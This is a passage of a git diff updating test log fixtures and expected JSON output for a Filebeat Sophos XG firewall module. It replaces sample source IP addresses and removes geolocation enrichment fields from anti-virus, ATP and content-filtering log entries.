         "source.port": 56336,
         "source.user.email": "info@farasamed.com",
         "tags": [
@@ -258,16 +226,9 @@
     {
         "@timestamp": "2020-05-18T14:38:36.000-02:00",
         "client.bytes": 0,
-        "client.ip": "23.254.247.78",
+        "client.ip": "216.160.83.61",
         "client.port": 54693,
-        "destination.as.number": 42652,
-        "destination.as.organization.name": "inexio Informationstechnologie und Telekommunikation Gmbh",
         "destination.bytes": 0,
-        "destination.geo.continent_name": "Europe",
-        "destination.geo.country_iso_code": "DE",
-        "destination.geo.country_name": "Germany",
-        "destination.geo.location.lat": 51.2993,
-        "destination.geo.location.lon": 9.491,
         "destination.ip": "185.7.209.194",
         "destination.port": 25,
         "destination.user.email": "info@elastic-user.local",
@@ -280,7 +241,7 @@
         "event.dataset": "sophos.xg",
         "event.kind": "alert",
         "event.module": "sophos",
-        "event.original": "device=\"SFW\" date=2020-05-18 time=14:38:36 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=031106210001 log_type=\"Anti-Virus\" log_component=\"SMTP\" log_subtype=\"Virus\" status=\"\" priority=Critical fw_rule_id=22 user_name=\"\" av_policy_name=\"default-smtp-av\" from_email_address=\"spedizioni@divella.it\" to_email_address=\"info@elastic-user.local\" subject=\"Re: NEW PRO-FORMA INVOICE\" mailid=\"<20200519072944.AFCA295AF2A037A6@divella.it>\" mailsize=537457 virus=\"Mal/BredoZp-B\" filename=\"\" quarantine=\"\" src_domainname=\"divella.it\" dst_domainname=\"\" src_ip=23.254.247.78 src_country_code=USA dst_ip=185.7.209.194 dst_country_code=DEU protocol=\"TCP\" src_port=54693 dst_port=25 sent_bytes=0 recv_bytes=0 quarantine_reason=\"Infected\"",
+        "event.original": "device=\"SFW\" date=2020-05-18 time=14:38:36 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=031106210001 log_type=\"Anti-Virus\" log_component=\"SMTP\" log_subtype=\"Virus\" status=\"\" priority=Critical fw_rule_id=22 user_name=\"\" av_policy_name=\"default-smtp-av\" from_email_address=\"spedizioni@divella.it\" to_email_address=\"info@elastic-user.local\" subject=\"Re: NEW PRO-FORMA INVOICE\" mailid=\"<20200519072944.AFCA295AF2A037A6@divella.it>\" mailsize=537457 virus=\"Mal/BredoZp-B\" filename=\"\" quarantine=\"\" src_domainname=\"divella.it\" dst_domainname=\"\" src_ip=216.160.83.61 src_country_code=USA dst_ip=185.7.209.194 dst_country_code=DEU protocol=\"TCP\" src_port=54693 dst_port=25 sent_bytes=0 recv_bytes=0 quarantine_reason=\"Infected\"",
         "event.outcome": "success",
         "event.severity": "2",
         "event.timezone": "-02:00",
@@ -293,7 +254,7 @@
         "host.name": "my_fancy_host",
         "input.type": "log",
         "log.level": "critical",
-        "log.offset": 2118,
+        "log.offset": 2113,
         "network.transport": "TCP",
         "observer.product": "XG",
         "observer.serial_number": "1234567890123456",
@@ -304,7 +265,7 @@
         ],
         "related.ip": [
             "185.7.209.194",
-            "23.254.247.78"
+            "216.160.83.61"
         ],
         "rule.id": "22",
         "server.bytes": 0,
@@ -326,18 +287,17 @@
         "sophos.xg.src_country_code": "USA",
         "sophos.xg.subject": "Re: NEW PRO-FORMA INVOICE",
         "sophos.xg.virus": "Mal/BredoZp-B",
-        "source.as.number": 54290,
-        "source.as.organization.name": "Hostwinds LLC.",
+        "source.as.number": 209,
         "source.bytes": 0,
-        "source.geo.city_name": "Seattle",
+        "source.geo.city_name": "Milton",
         "source.geo.continent_name": "North America",
         "source.geo.country_iso_code": "US",
         "source.geo.country_name": "United States",
-        "source.geo.location.lat": 47.4902,
-        "source.geo.location.lon": -122.3004,
+        "source.geo.location.lat": 47.2513,
+        "source.geo.location.lon": -122.3149,
         "source.geo.region_iso_code": "US-WA",
         "source.geo.region_name": "Washington",
-        "source.ip": "23.254.247.78",
+        "source.ip": "216.160.83.61",
         "source.port": 54693,
         "source.user.email": "spedizioni@divella.it",
         "tags": [
@@ -377,7 +337,7 @@
         "host.name": "firewall.localgroup.local",
         "input.type": "log",
         "log.level": "critical",
-        "log.offset": 2867,
+        "log.offset": 2862,
         "network.transport": "TCP",
         "observer.product": "XG",
         "observer.serial_number": "S4000806149EE49",
@@ -451,7 +411,7 @@
         "host.name": "firewall.localgroup.local",
         "input.type": "log",
         "log.level": "critical",
-        "log.offset": 3583,
+        "log.offset": 3578,
         "network.transport": "TCP",
         "observer.product": "XG",
         "observer.serial_number": "S4000806149EE49",
@@ -527,7 +487,7 @@
         "host.name": "firewall.localgroup.local",
         "input.type": "log",
         "log.level": "critical",
-        "log.offset": 4309,
+        "log.offset": 4304,
         "network.transport": "TCP",
         "observer.product": "XG",
         "observer.serial_number": "SFDemo-2df0960",
@@ -597,7 +557,7 @@
         "host.name": "firewall.localgroup.local",
         "input.type": "log",
         "log.level": "informational",
-        "log.offset": 4959,
+        "log.offset": 4954,
         "network.transport": "TCP",
         "observer.product": "XG",
         "observer.serial_number": "SFDemo-2df0960",
diff --git a/x-pack/filebeat/module/sophos/xg/test/atp.log-expected.json b/x-pack/filebeat/module/sophos/xg/test/atp.log-expected.json
index 7db8e56d00f2..8bfa784dcae3 100644
--- a/x-pack/filebeat/module/sophos/xg/test/atp.log-expected.json
+++ b/x-pack/filebeat/module/sophos/xg/test/atp.log-expected.json
@@ -3,13 +3,6 @@
         "@timestamp": "2017-01-31T18:44:31.000-02:00",
         "client.ip": "10.198.47.71",
         "client.port": 22623,
-        "destination.as.number": 44050,
-        "destination.as.organization.name": "Petersburg Internet Network ltd.",
-        "destination.geo.continent_name": "Europe",
-        "destination.geo.country_iso_code": "RU",
-        "destination.geo.country_name": "Russia",
-        "destination.geo.location.lat": 55.7386,
-        "destination.geo.location.lon": 37.6068,
         "destination.ip": "46.161.30.47",
         "destination.port": 80,
         "event.action": "drop",
@@ -75,16 +68,6 @@
         "@timestamp": "2020-05-18T14:38:34.000-02:00",
         "client.ip": "172.16.34.24",
         "client.port": 57579,
-        "destination.as.number": 16509,
-        "destination.as.organization.name": "Amazon.com, Inc.",
-        "destination.geo.city_name": "Seattle",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 47.6348,
-        "destination.geo.location.lon": -122.3451,
-        "destination.geo.region_iso_code": "US-WA",
-        "destination.geo.region_name": "Washington",
         "destination.ip": "13.226.155.22",
         "destination.port": 80,
         "event.action": "drop",
@@ -150,16 +133,6 @@
         "@timestamp": "2020-05-18T14:38:35.000-02:00",
         "client.ip": "172.16.34.24",
         "client.port": 57540,
-        "destination.as.number": 16509,
-        "destination.as.organization.name": "Amazon.com, Inc.",
-        "destination.geo.city_name": "Seattle",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 47.6348,
-        "destination.geo.location.lon": -122.3451,
-        "destination.geo.region_iso_code": "US-WA",
-        "destination.geo.region_name": "Washington",
         "destination.ip": "13.226.155.22",
         "destination.port": 80,
         "event.action": "drop",
@@ -225,13 +198,6 @@
         "@timestamp": "2018-06-05T08:49:00.000-02:00",
         "client.ip": "10.198.32.89",
         "client.port": 0,
-        "destination.as.number": 31400,
-        "destination.as.organization.name": "Accelerated IT Services & Consulting GmbH",
-        "destination.geo.continent_name": "Europe",
-        "destination.geo.country_iso_code": "DE",
-        "destination.geo.country_name": "Germany",
-        "destination.geo.location.lat": 51.2993,
-        "destination.geo.location.lon": 9.491,
         "destination.ip": "82.211.30.202",
         "destination.port": 0,
         "event.action": "alert",
diff --git a/x-pack/filebeat/module/sophos/xg/test/cfilter.log b/x-pack/filebeat/module/sophos/xg/test/cfilter.log
index 2e4796c35414..2cbc3304fe39 100644
--- a/x-pack/filebeat/module/sophos/xg/test/cfilter.log
+++ b/x-pack/filebeat/module/sophos/xg/test/cfilter.log
@@ -1,9 +1,9 @@
 <30>device="SFW" date=2017-01-31 time=14:03:33 timezone="IST" device_name="CR750iNG-XP" device_id=C44310050024-P29PUA log_id=050901616001 log_type="Content Filtering" log_component="HTTP" log_subtype="Allowed" status="" priority=Information fw_rule_id=2 user_name="jsmith" user_gp="Open Group" iap=1 category="Entertainment" category_type="Unproductive" url="https://r8---sn-ci5gup-qxas.googlevideo.com/" contenttype="" override_token="" httpresponsecode="" src_ip=10.198.47.71 dst_ip=182.79.221.19 protocol="TCP" src_port=9444 dst_port=443 sent_bytes=0 recv_bytes=319007 domain=r8---sn-ci5gup-qxas.googlevideo.com exceptions= activityname="" reason=""
-<30>device="SFW" date=2017-02-01 time=18:20:21 timezone="IST" device_name="SG115" device_id=S110000E28BA631 log_id=050902616002 log_type="Content Filtering" log_component="HTTP" log_subtype="Denied" status="" priority=Information fw_rule_id=1 user_name="" user_gp="" iap=13 category="Religion & Spirituality" category_type="Unproductive" url="http://hanuman.com/" contenttype="" override_token="" httpresponsecode="" src_ip=5.5.5.15 dst_ip=216.58.197.44 protocol="TCP" src_port=46719 dst_port=80 sent_bytes=0 recv_bytes=0 domain=hanuman.com exceptions= activityname=""
-<30>device="SFW" date=2017-02-01 time=18:13:29 timezone="IST" device_name="SG115" device_id=S110016E28BA631 log_id=054402617051 log_type="Content Filtering" log_component="Application" log_subtype="Denied" priority=Information fw_rule_id=1 user_name="" user_gp="" application_filter_policy=8 category="Mobile Applications" application_name="Gtalk Android" application_risk=4 application_technology="Client Server" application_category="Mobile Applications" src_ip=5.5.5.15 src_country_code=DEU dst_ip=74.125.130.188 dst_country_code=USA protocol="TCP" src_port=49128 dst_port=5228 sent_bytes=0 recv_bytes=0 status="Deny" message=""
+<30>device="SFW" date=2017-02-01 time=18:20:21 timezone="IST" device_name="SG115" device_id=S110000E28BA631 log_id=050902616002 log_type="Content Filtering" log_component="HTTP" log_subtype="Denied" status="" priority=Information fw_rule_id=1 user_name="" user_gp="" iap=13 category="Religion & Spirituality" category_type="Unproductive" url="http://hanuman.com/" contenttype="" override_token="" httpresponsecode="" src_ip=216.160.83.57 dst_ip=216.58.197.44 protocol="TCP" src_port=46719 dst_port=80 sent_bytes=0 recv_bytes=0 domain=hanuman.com exceptions= activityname=""
+<30>device="SFW" date=2017-02-01 time=18:13:29 timezone="IST" device_name="SG115" device_id=S110016E28BA631 log_id=054402617051 log_type="Content Filtering" log_component="Application" log_subtype="Denied" priority=Information fw_rule_id=1 user_name="" user_gp="" application_filter_policy=8 category="Mobile Applications" application_name="Gtalk Android" application_risk=4 application_technology="Client Server" application_category="Mobile Applications" src_ip=216.160.83.57 src_country_code=DEU dst_ip=74.125.130.188 dst_country_code=USA protocol="TCP" src_port=49128 dst_port=5228 sent_bytes=0 recv_bytes=0 status="Deny" message=""
 <30>device="SFW" date=2020-05-18 time=14:38:51 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=050901616001 log_type="Content Filtering" log_component="HTTP" log_subtype="Allowed" status="" priority=Information fw_rule_id=2 user_name="" user_gp="" iap=13 category="Information Technology" category_type="Acceptable" url="https://his-eur1-neur1.servicebus.windows.net/$servicebus/websocket" contenttype="" override_token="" httpresponsecode="" src_ip=172.17.34.10 dst_ip=13.79.168.201 protocol="TCP" src_port=62851 dst_port=443 sent_bytes=259 recv_bytes=168 domain=his-eur1-neur1.servicebus.windows.net exceptions="" activityname="" reason="" user_agent="" status_code="400" transactionid="" referer="" download_file_name="" download_file_type="" upload_file_name="" upload_file_type="" con_id=80042000 application="" app_is_cloud=0 override_name="" override_authorizer=""
 <30>device="SFW" date=2020-05-18 time=14:38:52 timezone="CEST" device_name="XG230" device_id=1234567890123457 log_id=050902616002 log_type="Content Filtering" log_component="HTTP" log_subtype="Denied" status="" priority=Information fw_rule_id=51 user_name="" user_gp="" iap=2 category="IPAddress" category_type="Acceptable" url="https://40.90.137.127/" contenttype="" override_token="" httpresponsecode="" src_ip=172.16.34.15 dst_ip=40.90.137.127 protocol="TCP" src_port=60471 dst_port=443 sent_bytes=0 recv_bytes=0 domain=40.90.137.127 exceptions="" activityname="" reason="" user_agent="" status_code="200" transactionid="" referer="" download_file_name="" download_file_type="" upload_file_name="" upload_file_type="" con_id=642960832 application="" app_is_cloud=0 override_name="" override_authorizer=""
-<30>device="SFW" date=2020-05-18 time=14:38:53 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=050901616001 log_type="Content Filtering" log_component="HTTP" log_subtype="Allowed" status="" priority=Information fw_rule_id=2 user_name="" user_gp="" iap=13 category="Information Technology" category_type="Acceptable" url="http://update.eset.com/eset_upd/ep7/dll/update.ver.signed" contenttype="" override_token="" httpresponsecode="" src_ip=172.17.34.15 dst_ip=91.228.167.133 protocol="TCP" src_port=65391 dst_port=80 sent_bytes=980 recv_bytes=295 domain=update.eset.com exceptions=av,https,sandstorm activityname="" reason="" user_agent="EFSW Update (Windows; U; 64bit; BPC 7.1.12010.0; OS: 10.0.17763 SP 0.0 NT; TDB 45511; CL 1.1.1; x64s; APP efsw; PX 1; PUA 1; CD 1; RA 1; PEV 0; UNS 1; UBR 1158; HVCI 0; SHA256 1; WU 3; HWF: 01009DAA-757A-D666-EFD2-92DD0D501284; PLOC de_de; PCODE 211.0.0; " status_code="304" transactionid="" referer="" download_file_name="" download_file_type="" upload_file_name="" upload_file_type="" con_id=248426360 application="" app_is_cloud=0 override_name="" override_authorizer=""
+<30>device="SFW" date=2020-05-18 time=14:38:53 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=050901616001 log_type="Content Filtering" log_component="HTTP" log_subtype="Allowed" status="" priority=Information fw_rule_id=2 user_name="" user_gp="" iap=13 category="Information Technology" category_type="Acceptable" url="http://update.eset.com/eset_upd/ep7/dll/update.ver.signed" contenttype="" override_token="" httpresponsecode="" src_ip=1.128.3.4 dst_ip=91.228.167.133 protocol="TCP" src_port=65391 dst_port=80 sent_bytes=980 recv_bytes=295 domain=update.eset.com exceptions=av,https,sandstorm activityname="" reason="" user_agent="EFSW Update (Windows; U; 64bit; BPC 7.1.12010.0; OS: 10.0.17763 SP 0.0 NT; TDB 45511; CL 1.1.1; x64s; APP efsw; PX 1; PUA 1; CD 1; RA 1; PEV 0; UNS 1; UBR 1158; HVCI 0; SHA256 1; WU 3; HWF: 01009DAA-757A-D666-EFD2-92DD0D501284; PLOC de_de; PCODE 211.0.0; " status_code="304" transactionid="" referer="" download_file_name="" download_file_type="" upload_file_name="" upload_file_type="" con_id=248426360 application="" app_is_cloud=0 override_name="" override_authorizer=""
 <30>device="SFW" date=2016-12-02 time=18:50:20 timezone="GMT" device_name="SF01V" device_id=1234567890123456 log_id=058420116010 log_type="Content Filtering" log_component="Web Content Policy" log_subtype="Alert" user="gi123456" src_ip=10.108.108.49 transaction_id="e4a127f7-a850-477c-920e-a471b38727c1" dictionary_name="complicated_Custom" site_category=Information Technology website="ta-web-static-testing.qa. astaro.de" direction="in" action="Deny" file_name="cgi_echo.pl" context_match="Not" context_prefix="blah blah hello " context_suffix=" hello blah "
 <30>device="SFW" date=2016-12-02 time=18:50:20 timezone="GMT" device_name="SFVUNL" device_id=C01001K234RXPA1 log_id=050927616005 log_type="Content Filtering" log_component="HTTP" log_subtype="Warned" status="" priority=Information fw_rule_id=2 user_name="rich" user_gp="Clientless Open Group" iap=13 category="Search Engines" category_type="Acceptable" url="http://www.google.com/" contenttype="" override_token="" httpresponsecode="" src_ip=192.168.73.220 dst_ip=64.233.189.147 protocol="TCP" src_port=37832 dst_port=80 sent_bytes=0 recv_bytes=0 domain=www.google.com exceptions= activityname=" Search" reason=""
 <30>device="SFW" date=2016-12-02 time=18:50:22 timezone="GMT" device_name="SFVUNL" device_id=C01001K234RXPA1 log_id=050901616006 log_type="Content Filtering" log_component="HTTP" log_subtype="Allowed" status="" priority=Information fw_rule_id=2 user_name="rich" user_gp="Clientless Open Group" iap=13 category="Search Engines" category_type="Acceptable" url="http://www.google.ca/?gfe_rd=cr&ei=ojxHWP3WC4WN8QeRioDABw" contenttype="text/html" override_token="" httpresponsecode="" src_ip=192.168.73.220 dst_ip=64.233.188.94 protocol="TCP" src_port=46322 dst_port=80 sent_bytes=0 recv_bytes=619 domain=www.google.ca exceptions= activityname="Search" reason="not eligible"
diff --git a/x-pack/filebeat/module/sophos/xg/test/cfilter.log-expected.json b/x-pack/filebeat/module/sophos/xg/test/cfilter.log-expected.json
index 9b6015900c79..6169a070cd57 100644
--- a/x-pack/filebeat/module/sophos/xg/test/cfilter.log-expected.json
+++ b/x-pack/filebeat/module/sophos/xg/test/cfilter.log-expected.json
@@ -3,13 +3,6 @@
         "@timestamp": "2017-01-31T14:03:33.000-02:00",
         "client.ip": "10.198.47.71",
         "client.port": 9444,
-        "destination.as.number": 9498,
-        "destination.as.organization.name": "BHARTI Airtel Ltd.",
-        "destination.geo.continent_name": "Asia",
-        "destination.geo.country_iso_code": "IN",
-        "destination.geo.country_name": "India",
-        "destination.geo.location.lat": 20.0,
-        "destination.geo.location.lon": 77.0,
         "destination.ip": "182.79.221.19",
         "destination.port": 443,
         "event.action": "allowed",
@@ -78,18 +71,8 @@
     },
     {
         "@timestamp": "2017-02-01T18:20:21.000-02:00",
-        "client.ip": "5.5.5.15",
+        "client.ip": "216.160.83.57",
         "client.port": 46719,
-        "destination.as.number": 15169,
-        "destination.as.organization.name": "Google LLC",
-        "destination.geo.city_name": "Mountain View",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.4043,
-        "destination.geo.location.lon": -122.0748,
-        "destination.geo.region_iso_code": "US-CA",
-        "destination.geo.region_name": "California",
         "destination.ip": "216.58.197.44",
         "destination.port": 80,
         "event.action": "denied",
@@ -101,7 +84,7 @@
         "event.dataset": "sophos.xg",
         "event.kind": "alert",
         "event.module": "sophos",
-        "event.original": "device=\"SFW\" date=2017-02-01 time=18:20:21 timezone=\"IST\" device_name=\"SG115\" device_id=S110000E28BA631 log_id=050902616002 log_type=\"Content Filtering\" log_component=\"HTTP\" log_subtype=\"Denied\" status=\"\" priority=Information fw_rule_id=1 user_name=\"\" user_gp=\"\" iap=13 category=\"Religion & Spirituality\" category_type=\"Unproductive\" url=\"http://hanuman.com/\" contenttype=\"\" override_token=\"\" httpresponsecode=\"\" src_ip=5.5.5.15 dst_ip=216.58.197.44 protocol=\"TCP\" src_port=46719 dst_port=80 sent_bytes=0 recv_bytes=0 domain=hanuman.com exceptions= activityname=\"\"",
+        "event.original": "device=\"SFW\" date=2017-02-01 time=18:20:21 timezone=\"IST\" device_name=\"SG115\" device_id=S110000E28BA631 log_id=050902616002 log_type=\"Content Filtering\" log_component=\"HTTP\" log_subtype=\"Denied\" status=\"\" priority=Information fw_rule_id=1 user_name=\"\" user_gp=\"\" iap=13 category=\"Religion & Spirituality\" category_type=\"Unproductive\" url=\"http://hanuman.com/\" contenttype=\"\" override_token=\"\" httpresponsecode=\"\" src_ip=216.160.83.57 dst_ip=216.58.197.44 protocol=\"TCP\" src_port=46719 dst_port=80 sent_bytes=0 recv_bytes=0 domain=hanuman.com exceptions= activityname=\"\"",
         "event.outcome": "success",
         "event.severity": "6",
         "event.timezone": "-02:00",
@@ -124,8 +107,8 @@
             "firewall.localgroup.local"
         ],
         "related.ip": [
-            "216.58.197.44",
-            "5.5.5.15"
+            "216.160.83.57",
+            "216.58.197.44"
         ],
         "server.ip": "216.58.197.44",
         "server.port": 80,
@@ -141,14 +124,16 @@
         "sophos.xg.log_type": "Content Filtering",
         "sophos.xg.message_id": "16002",
         "sophos.xg.priority": "Information",
-        "source.as.number": 6805,
-        "source.as.organization.name": "Telefonica Germany",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "DE",
-        "source.geo.country_name": "Germany",
-        "source.geo.location.lat": 51.2993,
-        "source.geo.location.lon": 9.491,
-        "source.ip": "5.5.5.15",
+        "source.as.number": 209,
+        "source.geo.city_name": "Milton",
+        "source.geo.continent_name": "North America",
+        "source.geo.country_iso_code": "US",
+        "source.geo.country_name": "United States",
+        "source.geo.location.lat": 47.2513,
+        "source.geo.location.lon": -122.3149,
+        "source.geo.region_iso_code": "US-WA",
+        "source.geo.region_name": "Washington",
+        "source.ip": "216.160.83.57",
         "source.port": 46719,
         "tags": [
             "forwarded",
@@ -162,15 +147,8 @@
     },
     {
         "@timestamp": "2017-02-01T18:13:29.000-02:00",
-        "client.ip": "5.5.5.15",
+        "client.ip": "216.160.83.57",
         "client.port": 49128,
-        "destination.as.number": 15169,
-        "destination.as.organization.name": "Google LLC",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "74.125.130.188",
         "destination.port": 5228,
         "event.action": "denied",
@@ -182,7 +160,7 @@
         "event.dataset": "sophos.xg",
         "event.kind": "alert",
         "event.module": "sophos",
-        "event.original": "device=\"SFW\" date=2017-02-01 time=18:13:29 timezone=\"IST\" device_name=\"SG115\" device_id=S110016E28BA631 log_id=054402617051 log_type=\"Content Filtering\" log_component=\"Application\" log_subtype=\"Denied\" priority=Information fw_rule_id=1 user_name=\"\" user_gp=\"\" application_filter_policy=8 category=\"Mobile Applications\" application_name=\"Gtalk Android\" application_risk=4 application_technology=\"Client Server\" application_category=\"Mobile Applications\" src_ip=5.5.5.15 src_country_code=DEU dst_ip=74.125.130.188 dst_country_code=USA protocol=\"TCP\" src_port=49128 dst_port=5228 sent_bytes=0 recv_bytes=0 status=\"Deny\" message=\"\"",
+        "event.original": "device=\"SFW\" date=2017-02-01 time=18:13:29 timezone=\"IST\" device_name=\"SG115\" device_id=S110016E28BA631 log_id=054402617051 log_type=\"Content Filtering\" log_component=\"Application\" log_subtype=\"Denied\" priority=Information fw_rule_id=1 user_name=\"\" user_gp=\"\" application_filter_policy=8 category=\"Mobile Applications\" application_name=\"Gtalk Android\" application_risk=4 application_technology=\"Client Server\" application_category=\"Mobile Applications\" src_ip=216.160.83.57 src_country_code=DEU dst_ip=74.125.130.188 dst_country_code=USA protocol=\"TCP\" src_port=49128 dst_port=5228 sent_bytes=0 recv_bytes=0 status=\"Deny\" message=\"\"",
         "event.outcome": "success",
         "event.severity": "6",
         "event.timezone": "-02:00",
@@ -195,7 +173,7 @@
         "host.name": "firewall.localgroup.local",
         "input.type": "log",
         "log.level": "informational",
-        "log.offset": 1224,
+        "log.offset": 1229,
         "network.transport": "tcp",
         "observer.product": "XG",
         "observer.serial_number": "S110016E28BA631",
@@ -205,7 +183,7 @@
             "firewall.localgroup.local"
         ],
         "related.ip": [
-            "5.5.5.15",
+            "216.160.83.57",
             "74.125.130.188"
         ],
         "server.ip": "74.125.130.188",
@@ -228,14 +206,16 @@
         "sophos.xg.priority": "Information",
         "sophos.xg.src_country_code": "DEU",
         "sophos.xg.status": "Deny",
-        "source.as.number": 6805,
-        "source.as.organization.name": "Telefonica Germany",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "DE",
-        "source.geo.country_name": "Germany",
-        "source.geo.location.lat": 51.2993,
-        "source.geo.location.lon": 9.491,
-        "source.ip": "5.5.5.15",
+        "source.as.number": 209,
+        "source.geo.city_name": "Milton",
+        "source.geo.continent_name": "North America",
+        "source.geo.country_iso_code": "US",
+        "source.geo.country_name": "United States",
+        "source.geo.location.lat": 47.2513,
+        "source.geo.location.lon": -122.3149,
+        "source.geo.region_iso_code": "US-WA",
+        "source.geo.region_name": "Washington",
+        "source.ip": "216.160.83.57",
         "source.port": 49128,
         "tags": [
             "forwarded",
@@ -246,16 +226,6 @@
         "@timestamp": "2020-05-18T14:38:51.000-02:00",
         "client.ip": "172.17.34.10",
         "client.port": 62851,
-        "destination.as.number": 8075,
-        "destination.as.organization.name": "Microsoft Corporation",
-        "destination.geo.city_name": "Dublin",
-        "destination.geo.continent_name": "Europe",
-        "destination.geo.country_iso_code": "IE",
-        "destination.geo.country_name": "Ireland",
-        "destination.geo.location.lat": 53.3338,
-        "destination.geo.location.lon": -6.2488,
-        "destination.geo.region_iso_code": "IE-L",
-        "destination.geo.region_name": "Leinster",
         "destination.ip": "13.79.168.201",
         "destination.port": 443,
         "event.action": "allowed",
@@ -279,7 +249,7 @@
         "http.response.status_code": "400",
         "input.type": "log",
         "log.level": "informational",
-        "log.offset": 1857,
+        "log.offset": 1867,
         "network.transport": "tcp",
         "observer.product": "XG",
         "observer.serial_number": "1234567890123456",
@@ -324,16 +294,6 @@
         "@timestamp": "2020-05-18T14:38:52.000-02:00",
         "client.ip": "172.16.34.15",
         "client.port": 60471,
-        "destination.as.number": 8075,
-        "destination.as.organization.name": "Microsoft Corporation",
-        "destination.geo.city_name": "Washington",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 38.7095,
-        "destination.geo.location.lon": -78.1539,
-        "destination.geo.region_iso_code": "US-VA",
-        "destination.geo.region_name": "Virginia",
         "destination.ip": "40.90.137.127",
         "destination.port": 443,
         "event.action": "denied",
@@ -359,7 +319,7 @@
         "http.response.status_code": "200",
         "input.type": "log",
         "log.level": "informational",
-        "log.offset": 2752,
+        "log.offset": 2762,
         "network.transport": "tcp",
         "observer.product": "XG",
         "observer.serial_number": "1234567890123457",
@@ -402,18 +362,8 @@
     },
     {
         "@timestamp": "2020-05-18T14:38:53.000-02:00",
-        "client.ip": "172.17.34.15",
+        "client.ip": "1.128.3.4",
         "client.port": 65391,
-        "destination.as.number": 50881,
-        "destination.as.organization.name": "ESET, spol. s r.o.",
-        "destination.geo.city_name": "Bratislava",
-        "destination.geo.continent_name": "Europe",
-        "destination.geo.country_iso_code": "SK",
-        "destination.geo.country_name": "Slovakia",
-        "destination.geo.location.lat": 48.15,
-        "destination.geo.location.lon": 17.1078,
-        "destination.geo.region_iso_code": "SK-BL",
-        "destination.geo.region_name": "Bratislava",
         "destination.ip": "91.228.167.133",
         "destination.port": 80,
         "event.action": "allowed",
@@ -424,7 +374,7 @@
         "event.dataset": "sophos.xg",
         "event.kind": "event",
         "event.module": "sophos",
-        "event.original": "device=\"SFW\" date=2020-05-18 time=14:38:53 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=050901616001 log_type=\"Content Filtering\" log_component=\"HTTP\" log_subtype=\"Allowed\" status=\"\" priority=Information fw_rule_id=2 user_name=\"\" user_gp=\"\" iap=13 category=\"Information Technology\" category_type=\"Acceptable\" url=\"http://update.eset.com/eset_upd/ep7/dll/update.ver.signed\" contenttype=\"\" override_token=\"\" httpresponsecode=\"\" src_ip=172.17.34.15 dst_ip=91.228.167.133 protocol=\"TCP\" src_port=65391 dst_port=80 sent_bytes=980 recv_bytes=295 domain=update.eset.com exceptions=av,https,sandstorm activityname=\"\" reason=\"\" user_agent=\"EFSW Update (Windows; U; 64bit; BPC 7.1.12010.0; OS: 10.0.17763 SP 0.0 NT; TDB 45511; CL 1.1.1; x64s; APP efsw; PX 1; PUA 1; CD 1; RA 1; PEV 0; UNS 1; UBR 1158; HVCI 0; SHA256 1; WU 3; HWF: 01009DAA-757A-D666-EFD2-92DD0D501284; PLOC de_de; PCODE 211.0.0; \" status_code=\"304\" transactionid=\"\" referer=\"\" download_file_name=\"\" download_file_type=\"\" upload_file_name=\"\" upload_file_type=\"\" con_id=248426360 application=\"\" app_is_cloud=0 override_name=\"\" override_authorizer=\"\"",
+        "event.original": "device=\"SFW\" date=2020-05-18 time=14:38:53 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=050901616001 log_type=\"Content Filtering\" log_component=\"HTTP\" log_subtype=\"Allowed\" status=\"\" priority=Information fw_rule_id=2 user_name=\"\" user_gp=\"\" iap=13 category=\"Information Technology\" category_type=\"Acceptable\" url=\"http://update.eset.com/eset_upd/ep7/dll/update.ver.signed\" contenttype=\"\" override_token=\"\" httpresponsecode=\"\" src_ip=1.128.3.4 dst_ip=91.228.167.133 protocol=\"TCP\" src_port=65391 dst_port=80 sent_bytes=980 recv_bytes=295 domain=update.eset.com exceptions=av,https,sandstorm activityname=\"\" reason=\"\" user_agent=\"EFSW Update (Windows; U; 64bit; BPC 7.1.12010.0; OS: 10.0.17763 SP 0.0 NT; TDB 45511; CL 1.1.1; x64s; APP efsw; PX 1; PUA 1; CD 1; RA 1; PEV 0; UNS 1; UBR 1158; HVCI 0; SHA256 1; WU 3; HWF: 01009DAA-757A-D666-EFD2-92DD0D501284; PLOC de_de; PCODE 211.0.0; \" status_code=\"304\" transactionid=\"\" referer=\"\" download_file_name=\"\" download_file_type=\"\" upload_file_name=\"\" upload_file_type=\"\" con_id=248426360 application=\"\" app_is_cloud=0 override_name=\"\" override_authorizer=\"\"",
         "event.outcome": "success",
         "event.severity": "6",
         "event.timezone": "-02:00",
@@ -437,7 +387,7 @@
         "http.response.status_code": "304",
         "input.type": "log",
         "log.level": "informational",
-        "log.offset": 3561,
+        "log.offset": 3571,
         "network.transport": "tcp",
         "observer.product": "XG",
         "observer.serial_number": "1234567890123456",
@@ -447,7 +397,7 @@
             "my_fancy_host"
         ],
         "related.ip": [
-            "172.17.34.15",
+            "1.128.3.4",
             "91.228.167.133"
         ],
         "server.ip": "91.228.167.133",
@@ -467,7 +417,9 @@
         "sophos.xg.log_type": "Content Filtering",
         "sophos.xg.message_id": "16001",
         "sophos.xg.priority": "Information",
-        "source.ip": "172.17.34.15",
+        "source.as.number": 1221,
+        "source.as.organization.name": "Telstra Pty Ltd",
+        "source.ip": "1.128.3.4",
         "source.port": 65391,
         "tags": [
             "forwarded",
@@ -500,7 +452,7 @@
         "host.name": "my_fancy_host",
         "input.type": "log",
         "log.level": "alert",
-        "log.offset": 4696,
+        "log.offset": 4703,
